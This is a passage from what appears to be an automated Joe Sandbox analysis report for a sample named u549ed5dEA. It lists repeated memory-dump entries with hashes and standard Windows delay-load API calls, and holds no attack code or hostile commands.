                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: dcb8d7a8776f700eeed004ca3078f24e5a94f72196f1b5de68e8b467d73f0374
                                              • Instruction ID: e46dacc787eeee53cca5f292d17154a9d942f8b0d3f8247240c5f359c089b6bf
                                              • Opcode Fuzzy Hash: dcb8d7a8776f700eeed004ca3078f24e5a94f72196f1b5de68e8b467d73f0374
                                              • Instruction Fuzzy Hash: CBB012C529D141BC310C62461D02CBA021DC0C1F10730832BF404C3143E4401C481231
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4CF1
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 8cc8cceb5b6f824c50d445945d3f2417a89ac01e51a637036fdfa0a034f5e309
                                              • Instruction ID: 1e936d7a1f6e40b4ee955618328df1d26e8ec214b4b3b26eeb6dc66a04bb4c16
                                              • Opcode Fuzzy Hash: 8cc8cceb5b6f824c50d445945d3f2417a89ac01e51a637036fdfa0a034f5e309
                                              • Instruction Fuzzy Hash: F4B012C529D142BC310C61462D02C7A021DD0C0F10730433FF004C2143E4401C451031
                                              APIs
                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 00CA2233
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory
                                              • String ID:
                                              • API String ID: 1611563598-0
                                              • Opcode ID: fa75ec8862f356b9eb551ad813c940c5cf7600884a8071654460ea01c44dd651
                                              • Instruction ID: 1298c9cad33e2af56a2dba25f2cf9341fada86171e18ae49e573d3685f829e01
                                              • Opcode Fuzzy Hash: fa75ec8862f356b9eb551ad813c940c5cf7600884a8071654460ea01c44dd651
                                              • Instruction Fuzzy Hash: DFC04870201201DF8708CFA8DACCF0A77AABFA271AB418568F444CB020CB34DC62DA25
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 7b99a2b47f6ebe88ef8bb0a9ac6a4b277290e0b0fe38cb9506c258c7836e40c5
                                              • Instruction ID: 46b43ef908858b000cee8fa41c260e3cd29c651ad813d933dc1df70263a9954b
                                              • Opcode Fuzzy Hash: 7b99a2b47f6ebe88ef8bb0a9ac6a4b277290e0b0fe38cb9506c258c7836e40c5
                                              • Instruction Fuzzy Hash: 28A001A6AAD152FC320C62A27E07CBB031EC5C5BA1B318A2BF502C6583A89159952031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: eeb0388c779c6f44a5f2d4dd880863f3949b047a36173d6319d8baebe91088f9
                                              • Instruction ID: 46b43ef908858b000cee8fa41c260e3cd29c651ad813d933dc1df70263a9954b
                                              • Opcode Fuzzy Hash: eeb0388c779c6f44a5f2d4dd880863f3949b047a36173d6319d8baebe91088f9
                                              • Instruction Fuzzy Hash: 28A001A6AAD152FC320C62A27E07CBB031EC5C5BA1B318A2BF502C6583A89159952031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f2896864de95b1adb909403bc0b7308a9d300c4067c294066a307413ca43bf24
                                              • Instruction ID: 46b43ef908858b000cee8fa41c260e3cd29c651ad813d933dc1df70263a9954b
                                              • Opcode Fuzzy Hash: f2896864de95b1adb909403bc0b7308a9d300c4067c294066a307413ca43bf24
                                              • Instruction Fuzzy Hash: 28A001A6AAD152FC320C62A27E07CBB031EC5C5BA1B318A2BF502C6583A89159952031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 7de852a153253c1fa27a2269518e95bf2034a4698dee0302f00a6ffe4786a986
                                              • Instruction ID: 46b43ef908858b000cee8fa41c260e3cd29c651ad813d933dc1df70263a9954b
                                              • Opcode Fuzzy Hash: 7de852a153253c1fa27a2269518e95bf2034a4698dee0302f00a6ffe4786a986
                                              • Instruction Fuzzy Hash: 28A001A6AAD152FC320C62A27E07CBB031EC5C5BA1B318A2BF502C6583A89159952031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 8e292d4bec0f5a53e49ae362e0e20c30a7e643f40fc91480f2eead2f32444e5a
                                              • Instruction ID: 46b43ef908858b000cee8fa41c260e3cd29c651ad813d933dc1df70263a9954b
                                              • Opcode Fuzzy Hash: 8e292d4bec0f5a53e49ae362e0e20c30a7e643f40fc91480f2eead2f32444e5a
                                              • Instruction Fuzzy Hash: 28A001A6AAD152FC320C62A27E07CBB031EC5C5BA1B318A2BF502C6583A89159952031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 240563561426dbcd6688e829cc288792cc2290f7af9381e6f50c9f0b94d8894c
                                              • Instruction ID: 46b43ef908858b000cee8fa41c260e3cd29c651ad813d933dc1df70263a9954b
                                              • Opcode Fuzzy Hash: 240563561426dbcd6688e829cc288792cc2290f7af9381e6f50c9f0b94d8894c
                                              • Instruction Fuzzy Hash: 28A001A6AAD152FC320C62A27E07CBB031EC5C5BA1B318A2BF502C6583A89159952031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: be356906b22c23fd5dde95436045ba83f9a9703409d49a06ba1b9d845a86b243
                                              • Instruction ID: 46b43ef908858b000cee8fa41c260e3cd29c651ad813d933dc1df70263a9954b
                                              • Opcode Fuzzy Hash: be356906b22c23fd5dde95436045ba83f9a9703409d49a06ba1b9d845a86b243
                                              • Instruction Fuzzy Hash: 28A001A6AAD152FC320C62A27E07CBB031EC5C5BA1B318A2BF502C6583A89159952031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: e8100b46405aabce316bb5e2155cf0a99049f5dd40f7ff1df2ea2a21dc07ce50
                                              • Instruction ID: fdadbfd81f0de769b8c07bf919050d321fdbe8d7e41aa56607611355990c647d
                                              • Opcode Fuzzy Hash: e8100b46405aabce316bb5e2155cf0a99049f5dd40f7ff1df2ea2a21dc07ce50
                                              • Instruction Fuzzy Hash: 3EA001D62AD552BD310C62966E07DBB121EC4D5BA5B31AA2FF602C6187A89058A52031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 318a95d87384c6435032b5df3b5dd0db9ad7c8f5a98dfda36594a17ac92050b4
                                              • Instruction ID: fdadbfd81f0de769b8c07bf919050d321fdbe8d7e41aa56607611355990c647d
                                              • Opcode Fuzzy Hash: 318a95d87384c6435032b5df3b5dd0db9ad7c8f5a98dfda36594a17ac92050b4
                                              • Instruction Fuzzy Hash: 3EA001D62AD552BD310C62966E07DBB121EC4D5BA5B31AA2FF602C6187A89058A52031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 9e281f39581110681373b07bacfa14630a03650c6372b1785ac2647e2b282a59
                                              • Instruction ID: fdadbfd81f0de769b8c07bf919050d321fdbe8d7e41aa56607611355990c647d
                                              • Opcode Fuzzy Hash: 9e281f39581110681373b07bacfa14630a03650c6372b1785ac2647e2b282a59
                                              • Instruction Fuzzy Hash: 3EA001D62AD552BD310C62966E07DBB121EC4D5BA5B31AA2FF602C6187A89058A52031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: bd2350bbbbc0c3e1c2e677a380a105645da962dbf26e8a4e2956f1ea978e9cab
                                              • Instruction ID: fdadbfd81f0de769b8c07bf919050d321fdbe8d7e41aa56607611355990c647d
                                              • Opcode Fuzzy Hash: bd2350bbbbc0c3e1c2e677a380a105645da962dbf26e8a4e2956f1ea978e9cab
                                              • Instruction Fuzzy Hash: 3EA001D62AD552BD310C62966E07DBB121EC4D5BA5B31AA2FF602C6187A89058A52031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: aca3f63284bdefd10ce0f4817197be06158ef22329d83544405f3cdfd8e1c64f
                                              • Instruction ID: fdadbfd81f0de769b8c07bf919050d321fdbe8d7e41aa56607611355990c647d
                                              • Opcode Fuzzy Hash: aca3f63284bdefd10ce0f4817197be06158ef22329d83544405f3cdfd8e1c64f
                                              • Instruction Fuzzy Hash: 3EA001D62AD552BD310C62966E07DBB121EC4D5BA5B31AA2FF602C6187A89058A52031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4B3B
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 8645eefe244f1df40cb5f05c8921045f82bc1dbc9f5d7dac19c23825295ce2f3
                                              • Instruction ID: b9a05723d165c18f94a9d6c4caf52ef9919acc7498c5fb7f8b03f08e6ec70b87
                                              • Opcode Fuzzy Hash: 8645eefe244f1df40cb5f05c8921045f82bc1dbc9f5d7dac19c23825295ce2f3
                                              • Instruction Fuzzy Hash: F9A001D62AD551BD310C6296AE07DBB121EC8E1B65B31A62FF601D6187A8A059A52031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 5621a3cfdd071f31fc8ed282776822781bef593ed0e222424f5454838470f164
                                              • Instruction ID: 414ebb3fe7c233eaad13274ae3a62b36acd3efc5cb93b9caa6e9591792b152f9
                                              • Opcode Fuzzy Hash: 5621a3cfdd071f31fc8ed282776822781bef593ed0e222424f5454838470f164
                                              • Instruction Fuzzy Hash: C2A001962AE156FC390C62926E46CBA071EC5C5FA2B328A2BF502C6583A89018952035
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
